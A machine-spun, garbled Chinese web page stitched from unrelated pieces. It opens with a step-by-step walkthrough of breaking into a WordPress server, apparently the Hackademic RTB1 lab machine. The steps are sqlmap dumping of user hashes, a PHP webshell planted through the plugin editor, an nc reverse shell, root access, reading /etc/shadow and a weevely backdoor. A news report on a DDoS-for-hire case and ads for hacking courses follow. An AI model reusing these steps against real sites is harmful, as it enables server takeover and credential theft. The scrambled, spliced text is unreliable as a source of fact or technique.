如今大家获得了网站 *** 服务器的IP地址为:173.236.138.113

找寻同一 *** 服务器上的其他网站，大家应用sameip.org.

大家必须关于你网站的下列信息内容：

DNS records (A, NS, TXT, MX and SOA)

Web Server Type (Apache, IIS, Tomcat)

Registrar (the company that owns your domain)

Your name, address, email and phone

Scripts that your site uses (php, asp, asp.net, jsp, cfm)

Your server OS (Unix,Linux,Windows,Solaris)

Your server open ports to internet (80, 443, 21, etc.)

使我们刚开始约你网站的DNS纪录，大家用who.is来进行这一总体目标.

大家发觉你的DNS纪录以下

使我们来明确web服务器的种类

大家如今早已获得了你的网站网站域名的基本信息，包含你的重要信息等.

我们可以根据backtrack5中的whatweb来获得你的网站 *** 服务器电脑操作系统种类和 *** 服务器的版本.

大家发觉你的网站应用了知名的php整站源码程序流程wordpress， *** 服务器的的系统软件种类为FedoraLinux，Web服务端版本Apache 2.2.15.再次查询网站 *** 服务器对外开放的端口号，用渗入检测工具nmap:

1-Find services that run on server(查询 *** 服务器上运作的服务项目)

2-Find server OS(查询电脑操作系统版本)

大家也会采用Backtrack 5 R1中的W3AF 专用工具:

root@bt:/pentest/web/w3af#

大家键入要检验的网站详细地址,挑选详细的 *** 安全审计选择项.

稍等一会，你可能见到扫描结果.

发觉你的网站存有sql注入系统漏洞、XSS系统漏洞、及其其他的系统漏洞.使我们来讨论SQL引入系统漏洞.

大家根据专用工具发觉这一URL存有SQL引入，大家根据Sqlmap来检验这一url.

Using sqlmap with –u url

过一会你能见到

键入N按回车再次

大家发觉你的网站存有mysql显错引入，mysql数据库查询版本是5.0. 大家根据添加主要参数”-dbs”来试着收集数据库查询名.

发觉三个数据库查询,接下去根据主要参数”-D wordpress -tables”来查询wordpress数据库查询的全部表名

根据主要参数“-T wp_users –columns ”来查询wp_users表格中的字段名.

接下去猜解字段user_login和user_pass的值.用主要参数”-C user_login,user_pass–dump”

大家会发觉登录名和登陆密码hashes值. 大家必须根据下列在线破解网站来破解密码hashes

登录wordpress的后台管理wp-admin

试着提交php webshell到 *** 服务器，以便捷运作一些linux指令.在软件网页页面找寻一切能够 编写的软件.大家挑选Textile这款软件，编写 *** 大家的php webshell，点一下升级文档，随后浏览大家的phpwebshell.

Phpwebshell被分析了，我们可以操纵你网站的文档，可是大家只期待得到 网站 *** 服务器的root管理权限,来侵入 *** 服务器上其他的网站。

大家用NC来反跳一个shell,更先在大家的电脑监视5555端口号.

随后在Php webshell上反方向联接大家的电脑上，键入你的IP和端口号5555.

点一下联接大家会见到

接下去大家试着实行一些指令：

id

uid=48(apache) gid=489(apache) groups=489(apache)

（用于显示信息客户的id和组）

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

（显示信息 *** 服务器上当今的途径）

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 *** P Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

（显示信息核心版本信息内容）

实行进行以后大家键入id指令

id

大家发觉大家早已是root管理权限了

uid=0(root) gid=0(root)

如今我们可以查询/etc/shadow文件

cat/etc/shadow

2.用weevely建立一个登陆密码为koko的php侧门

root@bt:/pentest/backdoors/web/weevely# -g -o hax.php -p koko

接下去上传入 *** 服务器以后来应用它

root@bt:/pentest/backdoors/web/weevely# -t - -pkoko

检测大家的hax.php侧门

进行，撒花！

如果有想学习培训python的程序猿，可来我的python学习培训扣qun：835017344，免费领取python的教程视频噢！我每夜里8点还会继续在群内直播间解读python专业知识，热烈欢迎大伙儿前去交流学习。

温州网讯 前不久，苍南县警察取得成功查获了一起利用黑客软件开展DDOS攻击的犯罪案，催毁了一条由海外 *** 黑客攻击源网站代付款商、攻击程序流程创作者、管理者、程序流程地区 *** 和在网上要求商等构成的灰黑色全产业链。

现阶段，8名嫌疑人被采用刑事案件强制执行措施，各自因涉嫌毁坏计算机软件系统软件罪，出示入侵、不法操纵计算机软件系统软件程序流程、专用工具罪，散播淫秽物品牟取暴利罪等，此案仍在进一步侦察中。

“倘若餐馆A能容下100位顾客，两者之间存有竞争关系的餐馆B老总某一天雇佣200本人去餐馆A，干坐下来又不消費，那毫无疑问危害餐馆A的一切正常运营。”前几日，苍南公安民警那样表述互联网DDOS攻击。

DDOS攻击，全名分布式系统拒绝服务攻击攻击，其最基础的 *** 便是利用有效的服务项目要求来占有过多的服务项目資源，进而使合理合法客户没法获得服务项目的回应，做到类似上原文中餐馆A没法正常营业的实际效果。

打工赚钱闲暇通过自学 *** 黑客专业知识进行DDOS攻击

网上发展趋势数十名 *** 商

湖南人杨琛(笔名)中学退学，随爸爸妈妈去广东打工赚钱。他大白天在加工厂的生产流水线上制做箱包皮具箱包皮具，工作之余喜爱网上游逛。二零一五年底，杨琛触碰到一个 *** 信息安全技术交流，网民在上面共享的互联网基础教程吸引住了他。

杨琛刚开始通过自学，并依照实例教程的引导，进到海外某网站，发觉能够 进行“手动式”的DDOS互联网攻击。前不久，杨琛说，登陆该网站后，必须付钱注册会员，以后只需键入总体目标网站的IP地址，挑选攻击种类和攻击分秒，就可以进行DDOS攻击。

杨琛追忆，在该网站选购vip会员价钱较低，一般vip会员包年只需几十元中国人民币，高級vip会员花销在100～150元中间，更高級的也只需七八百元。唯一不便的是，必须选用 *** C付款，他只能请出示清算服务项目的代付款商王某帮助。

社区论坛里有实例教程解读，能够 撰写互联网攻击手机软件，利用该海外网站的总流量进行互联网攻击，杨琛打着了歪主意。他沒有自主撰写手机软件的工作能力，便雇佣了网民王天(笔名)协助撰写。

取得编完的手机软件后，杨琛快速“市场开拓”，他建立了一个 *** 群，把之前打游戏、沟通交流程序编写时了解的盆友都加进来，并呼吁她们再次邀人，而杨琛则每日在群内公布该互联网攻击手机软件的市场销售信息内容。除开自主市场销售，杨琛仍在群内发展趋势了10多名总经销商和50多名分 *** 商。被警察破获时，群内已超出700人。

17岁少年撰写黑客软件

可随便“打垮”一家小网站

杨琛称，利用这类手机软件，能够 很随便地“打垮”一家小网站。遭受攻击后，这种小网站便会出現卡堵状况，乃至打不开。

杨琛才满二十岁，而受聘帮他撰写攻击手机软件的王天仅有十七岁。审理案件公安民警表明，当今 *** 诈骗年轻化、低文凭化的发展趋势很显著。二十岁上下的人对 *** 信息安全技术性特别喜爱，喜爱通过自学，而在网上这些方面的学习材料又十分多。他告知新闻记者，自身过去解决该类案子时，犯罪嫌疑人“基础全是三十岁下列的”。

此前，关押在苍南县拘留所的王天说，自身自小由于得病的原因，一直一个人玩。刚开始触碰互联网后，碰到了志趣相投的网民，起先一起打网游，随后一起科学研究 *** 科技。

王天说，自身喜爱手机软件，他觉得到，编码是死的，但手机软件是活的，他喜爱造就手机软件的全过程中的不明性。王天每日在各种技术交流中学习 *** 技术性专业知识，现实生活中也报名了一家软件学校。

上年的一天，杨琛在开发软件 *** 群中寻找王天，两个人一拍即合。由杨琛付款五百元，王天承担将海外网站的网页端编为一个可以进行DDOS攻击的程序流程。王天只花了一晚上的時间就写好啦。

利用这一手机软件，如同在海外网站的网页页面上一样，使用人只需键入总体目标网站的IP地址，挑选攻击時间，就可以进行一次DDOS攻击。

“攻占”服务平台直播房间

轻轻松松盈利逾万余元

在生产流水线上可重复性辛勤劳动，杨琛每个月只有收益3000多元化，殊不知根据市场销售DDOS攻击手机软件，杨琛却能轻轻松松获 利逾万元。

　　不仅如此，除了销售软件，杨琛还“接单”，替人发起DDOS *** 攻击。

　　去年9月，杨琛受雇对一家金融直播平台发起攻击，雇用他的，则是另一家金融直播平台的老板王世楠(化名)。王世楠称，从去年7月份开始，自家直播平台不断遭到 *** 攻击，出现了网站卡顿、延迟等问题，更换服务器后解决了这个问题。可一个月以后，网站再遭攻击，点击网站链接，经常会跳转到另一家 *** 直播平台上去。

　　出于报复的心理，王世楠同意了下属提出的“反攻”建议。去年9月份，他们雇用了杨琛，对一家存在竞争关系的金融直播平台进行攻击，造成对方平台出现无法登录、网站卡顿等情况。

　　王世楠说，攻击持续了10多天，每次都会选择夜间，因为晚上直播间在线人数多，造成的影响比较明显。

　　杨琛说，自己最初“也觉得可能有点问题”，但对方开出的价码太诱人了。攻击了10多次，杨琛共拿到了6000多元钱。

　　攻击成本低廉

　　DDOS攻击屡打不绝

　　去年8月，苍南县网安部门接到线索，抓获了苍南县居民唐某。唐某是杨琛的 *** 商之一，顺藤摸瓜，警方将杨琛抓获，继而抓获 *** DDOS攻击程序的王天、为境外黑客攻击源网站费用提供结算服务的代付商李某等犯罪嫌疑人，后王世楠自首。

　　办案民警称，本起案件并非孤例，当前 *** 安全形势很严峻，这种 *** 攻击在中小网站之间很普遍。黑客组织就像 *** 黑社会，传统商业社会中的敲诈勒索等行为，在网上演变成通过 *** 攻击进行的非法商业竞争。例如，传统盗窃是进入公民家中偷东西，而 *** 攻击则可以直接进入网上银行进行盗窃。传统敲诈则演变成通过攻击你的网站，让网站无法访问进而敲诈钱财。

　　王天也证实，“这种事情在我们这个圈子很普遍。”他加了很多 *** 技术的 *** 群，每个群里都有几百人，并且每个群里都有人提供攻击网站的服务，有人甚至提出一块钱就能帮忙攻击一天。

　　王天说，有人有需求了，就去群里发个红包，领了红包的人就帮忙发起攻击。一些小网站很容易被攻陷，大网站就会难一些，费用也更高。此外，办案民警也表示，之所以DDOS攻击屡打不绝，和其攻击成本相对低廉有关。“攻击成本和防护成本相差得非常悬殊。”

　　公安部表示，将部署进一步加大侦查打击力度，对相关犯罪进行全链条、各环节严厉打击，进一步铲除相关利益链条。公安机关同时提醒，公众在日常使用计算机的同时，也要加强信息防护和系统防护，不让不法分子有可乘之机。

　　想学习WEB安全渗透攻防黑客技术的同学们

　　请同学们添加老师微信：yi_jin_001

　　领取学习工具包，了解实地线下培训、授课方式、课程服务、获取课程大纲

　　体验课专属实战靶场资格、直播回放视频（手机+电脑在线观看）

　　课程介绍

　　WEB是一个很大很大的体系，随着互联网的高度发展同时；互联网的开放性和安全漏洞带来的风险也无处不在。

　　 *** 攻击行为日趋复杂；黑客攻击行为组织性更强；针对手机无线终端的 *** 攻击日趋严重；

　　有关 *** 攻击和数据泄露的新闻层出不穷， *** 安全问题成为 *** 、企业、用户关注的焦点。

　　渗透测试是站在第三者的角度来思考企业系统的安全性的，通过渗透测试可以发觉企业潜在却未纰漏的安全性问题。

　　企业可以根据测试的结果对内部系统中的不足以及安全脆弱点进行加固以及改善，

　　从而使企业系统变得更加安全，减低企业的风险。

　　下滑了解发展前景薪资待遇及师资力量 ↓ ↓ ↓